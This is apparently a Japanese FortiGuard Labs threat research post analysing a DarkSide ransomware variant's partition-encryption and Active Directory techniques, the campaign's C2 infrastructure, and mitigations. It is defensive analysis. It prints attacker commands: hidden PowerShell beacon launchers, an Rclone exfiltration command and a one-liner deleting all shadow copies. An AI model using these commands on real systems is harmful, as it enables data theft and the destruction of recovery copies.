脅威リサーチ

DarkSideのランサムウェアに新たに発見されたディスクパーティションを狙う機能

投稿者 Fred Gutierrez, Gayathri Thirugnanasambandam, および Val Saengphaibul | 2021年5月21日

FortiGuard Labs Threat Research Report

影響を受けるプラットフォーム:Windows
リスクのレベル: 高/中。このランサムウェアの亜種は、コロニアルパイプラインを標的とした同じ犯罪者によって作成されたもので、パーティションに分割されたハードドライブを検出して侵害する機能を備えています。
影響度: 中。この攻撃は現在、標的となる組織に限定されており、広範囲にわたるワームのような活動の結果ではないと考えられます。

はじめに

FortiGuard Labsは、コロニアルパイプラインを攻撃した脅威アクターが使用した新たな戦術を発見しました。この異なるDarkSideランサムウェアの亜種において、FortiGuard Labsのリサーチャーは、パーティション情報を探し出して複数のディスクパーティションを危険にさらす機能を発見しました。

発見当初、FortiGuard Labsのリサーチャーは、このランサムウェアがパーティションを探し出し、システム管理者がバックアップファイルを隠すために設定した隠しパーティションの可能性を探していると考えていました。しかし、さらなる分析により、さらに高度な技術が確認されました。このDarkSideの亜種は、マルチブートシステム上のパーティションを探し出して、暗号化するファイルを追加で見つけることで、より大きなダメージを与え、ファイルを回復するために身代金を支払う動機付けを高めています。

このブログで、読者は以下のことがわかるでしょう。

  1. DarkSideのランサムウェアのコードは効率的でよく構築されており、サイバー犯罪者の組織には経験豊富なソフトウェアエンジニアが含まれていることを示しています。
  2. このランサムウェアの亜種(コロニアルパイプラインの業務を妨害するために使用されたバージョンではありません)は本質的に高度であり、マルチブート環境のパーティションを探し出してさらなるダメージを与えることが確認されています。また、ドメインコントローラを探し出し、LDAP 匿名認証でアクティブディレクトリに接続します。
  3. DarkSideが使用するファイルや関連するファイルについてのさらなる洞察を、FortiGuardインシデント レスポンス チームが最近明らかにしました。
  4. 2016年に米国で発生したDNC選挙攻撃をはじめ、長年にわたって様々な悪意あるアクターが数々の悪質な活動に使用してきた、(脅威リサーチャーにとって)よく知られた防弾ホストを使用しています。

FortiGuard LabsによるDarkSideの亜種の拡大分析

FortiGuard Labsは、サイバー犯罪組織DarkSideのこの亜種において、これまでのランサムウェアでは見られなかった新しい技術を発見しました。このDarkSideの亜種[1]は、CTAとのパートナーシップにより入手しました。

このランサムウェアのサンプルは、コロニアルパイプラインのキャンペーンとは無関係で、ほとんどのマルウェアでは珍しく、無駄なスペースをほとんど使わずに効率的にプログラムされており、コンパイラの肥大化も最小限に抑えられています。ファイルサイズはマルウェアとしては比較的小さい(57,856バイト)ものの、予想よりもはるかに大きなペイロードを配信することができます。次のセクションでは、このDarkSideの亜種が実行する、よりユニークな2つの機能について詳しく見ていきます。1つは、Active Directoryを扱うもので、もう1つはパーティションに関するものです。

悪意のあるアクターは、Active Directoryが基本的にネットワーク情報の金鉱であることを知っています。今回のキャンペーンでは、DarkSideグループがランサムウェアのソフトウェアにActive Directoryへの攻撃を組み込んでいました。これを実現するために、まずドメインコントローラを探そうとします。

図1:ドメインコントローラの検索

ドメインコントローラが見つかれば、それを使ってActive Directoryに接続しようとします。しかし、これを行うには通常パーミッションが必要なので、このDarkSideの亜種はLDAPを使って匿名で認証しようとします。以下の一連の流れの中で、NULLのパスワードとNULLのユーザー名を使っています。

図2:LDAPの匿名認証

このDarkSideの亜種は、COMを使用してActive Directoryとの接続を試みます。成功すると、このマルウェアはdefaultNamingContextやdnsHostNameなどの特定の変数を削除しようとします。

Active Directoryのクエリを発行した後、ランサムウェアはコードのこのセクションで見つかったネットワーク共有内のファイルを暗号化しようとします。DarkSideは、C$とADMIN$という名前の共有を避けるようにしており、また、共有内のファイルを暗号化しようとする前に、まず共有が書き込み可能かどうかを確認していることに注目してください。C$とADMIN$はデフォルトで知られている管理者用の共有で、無効化や再設定されていない場合、AdministratorsグループまたはBackup Operatorsグループのメンバーのみがアクセスできるようになっています。DarkSideは、管理者のコンテキストで実行されていない可能性があるため、これらの共有を避け、アクセスしようとするとアラートが発生する可能性があると思われます。

よりユニークな動作が別の場所で見つかりました。Petya(NotPetyaとも呼ばれる)ランサムウェアと同様に、DarkSideもハードドライブをスキャンして追加の動作を行います。Petyaの場合、MBR(マスターブートレコード)が感染していたため、ユーザーがコンピュータの電源を入れると、MBRから直接ランサムノートが起動し、実質的にコンピュータが使用できなくなりました。この方法の詳細については、こちらのPetyaブログを参照してください)。しかし、DarkSideの亜種の場合は、ドライブがマルチブートシステムであるかどうかをスキャンして、追加のボリュームやパーティションを見つけ、それらのファイルも暗号化しようとします。(注:パーティションとボリュームの技術的な定義は異なりますが、本ブログではこの2つを同義で使用しています。)

図3:ボリュームに対するループ処理

このマルウェアは、対象となるドライブタイプを見つけると、そのドライブが実行されているWindowsのバージョンを確認します。Windows 7以上のシステムでは、マルウェアはbootmgrファイルが入っているボリュームを探します。bootmgrファイルは、C:\ drive のルートにある場合もあれば、別のボリュームに保存されている場合もあります。

図4:新しいOS

Windows 7より古いシステムでは、DarkSideは異なるアプローチを選択します。IOCTL_DISK_GET_PARTITION_INFO_EX制御コードを使って、DeviceIoControl APIを呼び出します。(ちなみに、Petyaもこの制御コードを使用していました。この2つの攻撃の類似点は非常に興味深いものがあります。) Microsoftによると、この制御コードは、ディスクパーティションのタイプ、サイズ、性質に関する拡張情報を取得します。しかし、この DarkSide ランサムウェアの亜種は、その結果を別の方法で使用します。

図5:パーティション

見つかったパーティションスタイルがMBR(Master Boot Record)であれば、先に進み、このパーティションが起動可能かどうかを確認します。もしそうでなければ、そのパーティションをマウントしようとします。起動可能なパーティションにはデータベースやその他の関連データが含まれている可能性があるため、これはプログラミング上のバグのようです。おそらくDarkSideは、起動可能なパーティション内のファイルではなく、データパーティション内のファイルのみを暗号化しようとしているのでしょう。

図6:MBRバグの可能性

しかし、パーティションの形式がGPT(GUID[Globally Unique Identifier]パーティションテーブル)の場合、DarkSideは別のステップを踏みます。GUIDパーティションのフォーマットの最初のエントリーはパーティションのタイプで、予想通りGUIDで定義されています。

Partition Definition

GUID

EFI System

{C12A7328-F81F-11D2-BA4B-00A0C93EC93B}

Windows Recovery Environment

{ DE94BBA4-06D1-4D40-A16A-BFD50179D6AC}

図7:パーティションの種類

これらのGUIDのいずれかがDeviceIoControl APIの呼び出し結果と一致した場合、DarkSideはこれらのパーティションをスキップして次のパーティションに移動します。(Petyaとは異なり、DarkSideは明らかな理由により、少なくとも感染したマシンを半回復可能な状態にしておきたいと考えているようです。) この時点で(MBRデータパーティションであれ、除外されていないGPTボリュームであれ)、DarkSideは先に進み、SetVolumeMountPointW APIを使用してパーティションのマウントを試みます。ボリュームが正常にマウントされると、DarkSideは内部に含まれるファイルの暗号化を試みます。

私たちが調べた限りでは、このような行為はランサムウェアの世界では初めてのことです。そのため、世界のサイバーセキュリティコミュニティは、この攻撃戦略に対して適切に保護されていない可能性があります。

別のDarkSideキャンペーンで使用されていることが確認された追加ファイル

上記のサンプルは信頼できるパートナーから提供されたものですが、FortiGuardインシデント レスポンス チームは、DarkSideサイバー犯罪者に関連する他の活動を観察しました。これらの観察から得られた詳細は、DarkSideのサイバー犯罪者が使用する戦術と技術にさらなる光を当てています。例えば、SMBビーコン、HTTPSビーコン、Rcloneというコマンドラインツールを使用したデータ抽出のためのコンポーネント、WMIアクティビティ、マルウェアの実行などの使用について、さらなる洞察が得られました。

SMBとHTTPSのビーコン

DarkSide が使った SMB ビーコンをさらに分析すると、Cobalt Strike の PowerShell コードが見えてきます。ここでは、環境変数%COMSPEC%の値が "C:\Windows\System32\cmd.exe "となっており、ユーザーに知られないように、また検知されないように、新しいウィンドウを作らずに最小化した状態でPowerShellアプリケーションを起動するためのコマンドライン引数を提供しています。エンコードされたPowerShellコードは、Cobalt Strike SMB Beaconのペイロードです。

%COMPSPEC% /b /c start /b /min powershell -nop -w hidden -encodedcommand <Encoded SMB Beacon payload>

デコードされたPowerShellコマンドは、SMBビーコン通信において、「\\.\.pipe\UIA_PIPE_」という名前のパイプを作成します。このパイプは双方向性で、サーバープロセスとクライアントプロセスの両方がパイプの読み書きを行うことができます。

CreateNamedPipeA(\\.\pipe\UIA_PIPE_xxxx, 3, 6, 1, 4b000, 4b000, 0, 0)

もうひとつの発見は、HTTP ビーコンです。次のPowerShellコマンドは、IP(185.180.197[.]86)にあるマルウェアのコマンド&コントール (C2)サーバにアウトバウンドで接続するホストに対して、HTTPS BEACONペイロードを実行します。これは、InternetConnectA(server:tailgatethenation.com, port: 443, )というコマンドを使用して行います。

%COMPSPEC% /b /c start /b /min powershell -nop -w hidden -encodedcommand <Encoded HTTPS Beacon payload>

このC2 IPアドレス(185.180.197[.]86)は、2019年に非常に活発で、長い休止期間を経て2021年4月19日に再び観測されました。このIPアドレスが1年以上休眠状態であった理由はわかりません。

図 11. 185.180.197[.]86の2019年~2021年におけるトラフィック

C2 IP 185[.]180[.]197[.]86のパッシブDNSエントリを以下に示します。他の脅威リサーチャーは、このIPがDarkSideによって使用されていることを報告しており、これにより、このIPがどのようなデータに使用されているかを知ることができます。見てわかるように、ランサムウェアのC2サーバーとして使用される前は、主にポルノに使用されていました。

図12. 185.180.197[.]86 の過去のパッシブ DNS エントリ

DarkSide C2: IPのさらなる調査

さらなる調査の結果、185[.]180[.]197[.]86 のIPアドレスは、米国のKingServers B.V.と同居していることが判明しました。KingServersは、情報セキュリティコミュニティによって防弾ホストとして分類されており、オランダを拠点としていますが、DarkSideの所在地であるロシアとのつながりがあります。

防弾ホスティングとは、いくつかのホスティング会社が提供するサービスで、顧客がアップロードしたり配布したりするデータの種類や、テイクダウンされることなく行える活動についても、かなり寛容なポリシーで運用されています。KingServersは、セキュリティジャーナリストのBrian Krebs氏などが取材したことでも知られる、InfoSecコミュニティでは有名なホスティングサイトです。具体的には、インドのITアウトソーシング企業に対するギフトカード詐欺を目的とした攻撃や、米国で2016年に発生したDNC攻撃など、いくつかの注目すべき攻撃に同社のホスティングサービスが利用されました。

30日間に観測されたテレメトリを確認すると、DarkSideのC2サーバーに接続する米国のマシンからのトラフィックが集中しており、米国がトップ(60%)で、次いでオランダ(9%)、シンガポール(8%)、ブラジル(4%)、英国(4%)となっています。これは、Darksideが最初の7ヶ月間で少なくとも6,000万ドルをネットで稼ぎ、今年の最初の3ヶ月間で4,600万ドルを稼いだという報告に対応するものです。

図 13. 30日間の185[.]180[.]197[.]86 へのトラフィック

図 14. 185.180.197[.]86 への 30 日間のポート 443 トラフィック

Darksideランサムウェアの攻撃者は、主にTORを介してルーティングされたポート443で実行されるRDPクライアントを使って、コマンド&コントロールを確立しました。ポート443とC2サーバ185[.]180[.]197[.]86:443間の30日間の接続を見ると、米国を拠点とするマシンからのトラフィックが集中しており、米国がトップ(82%)、次いでオランダ(9%)、英国、アイスランド、フィリピン/スイス(同率)がトップ5のpingを占めています。

侵入

分析中に発見されたWindowsタスクは、データの流出がどのようにして行われたかを示しています。このタスクは、ローカルシステムとクラウドストレージ間でファイルやディレクトリを同期するために使用されるコマンドラインツール「Rclone」を使用して実行されました。このケースでは、検出されないようにRcloneバイナリの名前が変更され、「C:\Users\Public\」というディレクトリにドロップされています。脅威アクターは、過去1年間に作成された.xls、.xlsx、.doc、.docx、.pdfのファイル形式のファイルを流出させることを目的としていました。

Rclone copy <source> <dest> –max-age 1y –ignore-existing –drive-chunk-size 512M –buffer-size=4G –transfers 20 –checkers 40 –include *.{xls,xlsx,doc,docx,pdf}

WMIアクティビティ

データ復旧を妨害するために、ランサムウェアのペイロードはWindows Management Instrumentation(WMI)サービスへのアクセスを試みました。

さらに、難読化されたPowerShellコマンドが発見されたことで、この攻撃の影響はさらに大きくなりました。

“Get-WmiObject W32_Shadowcopy | ForEach-Object {$_.Delete();}” 

PowerShellコマンドレット「Get-WmiObject」を使用して、すべてのVolume Shadow Copyを削除し、データ復旧を妨害しました。

マルウェアの実行

リモート管理ツールであるPsExecが、主要なマルウェアのペイロード(.exe)を実行していることが確認されました。ランサムウェアのペイロード(.dll)は共有フォルダでホストされており、バッチスクリプトを実行してペイロードをホストのC:\Users\Publicディレクトリにコピーしていました。このペイロードは、rundll32 を使用して実行され、永続性を維持するためにサービスが作成されました。ワーカープロセス内には複数の暗号化ルーチンがあり、暗号化ルーチンが直接呼び出されて暗号化が実行され、ランサムウェアのアーティファクトが作成されました。

結論

今回のブログでは、DarkSideの背後にいる脅威アクターが、普通のRansomware as a Serviceではないことを強調します。その攻撃とコードの精巧さから、一人の人間が首謀者である可能性も低いと考えられます。このグループは、ランサムウェア自体を作成するだけでなく、どのデータが盗まれたか、そのデータの量、そのデータに含まれるもの(GB単位のデータ量も含む)、被害者を組織化して辱めるために行ったことなど、詳細な作業、努力、計画、時間を費やしており、これが相当なリソースと時間を持つ組織の仕事であることを強調しています

コロニアルパイプライン攻撃に関連するDarkSideの概要については、過去のブログおよびThreat Signal Report(脅威シグナルレポート:英語)をご参照ください。

フォーティネットのソリューション

FortiGuard Labs

FortiGuard Labsは、一般に公開されているDarkSideランサムウェアと関連するキャンペーンのサンプルに対して、以下のAVシグネチャを導入しています。

PossibleThreat

Riskware/Agent

Riskware/PCH

Riskware/PowerTool

Riskware/RemoteUtilities

Riskware/TorTool

W32/DarkSide.B!tr.ransom

W32/Filecoder.ODE!tr.ransom

W32/Filecoder_DarkSide.A!tr

W32/Filecoder_DarkSide.B!tr

W32/GenKryptik.FBOV!tr

W32/Packed.OBSIDIUM.BV!tr

W64/Kryptik.BVR!tr

FortiGuard Labsでは、Cobalt Strikeのビーコンアクティビティに対し、以下のIPSシグネチャを用意しています。

Backdoor.Cobalt.Strike.Beacon

TOR(ダークウェブ)アクティビティについては、FortiGuard Labs Application ControlのシグネチャがすべてのTOR関連アクティビティを検出します。

FortiEDR

関連するすべてのIOCは当社のクラウド基盤にもインテリジェンスとして追加されており、お客様のシステムで実行されるとブロックされます。

FortiEDRは、上記で引用したWMIサービスアクセス操作を以下のように検出し、ブロックします。

また、FortiEDRは、ランサムウェアのワーカープロセスの実行に使用される「Rundll32.exe」を検出し、ブロックします。

Webフィルタリング

利用可能なすべてのネットワークIOCがクライアントによってブロックされます。

その他の減災策

混乱を招きやすく、日常業務や評判に損害を与える可能性があり、個人を特定できる情報(PII)などが意図せずに流出する可能性があるため、すべてのAVおよびIPSシグネチャを最新に保つことが重要です。

また、攻撃者がネットワーク内に足場を築くのを防ぐためには、組織内のすべての既知のベンダーの脆弱性に対処し、更新することが不可欠です。

ランサムウェアの攻撃のほとんどはエンドユーザの感染から始まるため、組織は、最新のフィッシング/スピアフィッシング攻撃について従業員を教育し、情報を提供するための継続的なトレーニングセッションを実施することが推奨されます。また、知らない人からの添付ファイルは絶対に開かないようにし、認識できない/信頼できない送信者からのメールは常に慎重に扱うように従業員に奨励する必要があります。そのためには、定期的なトレーニングや、社内のセキュリティ部門があらかじめ用意したテンプレートを使って即席のテストを行うことが有効です。また、悪意のある添付ファイルやリンクを含む電子メールを見分ける方法をユーザーに教えるだけでも、ネットワークへの初期アクセスを防ぐことができます。


1 SHA256:0a0c225f0e5ee941a79f2b7701f1285e4975a2859eb4d025d96d9e366e81abb9)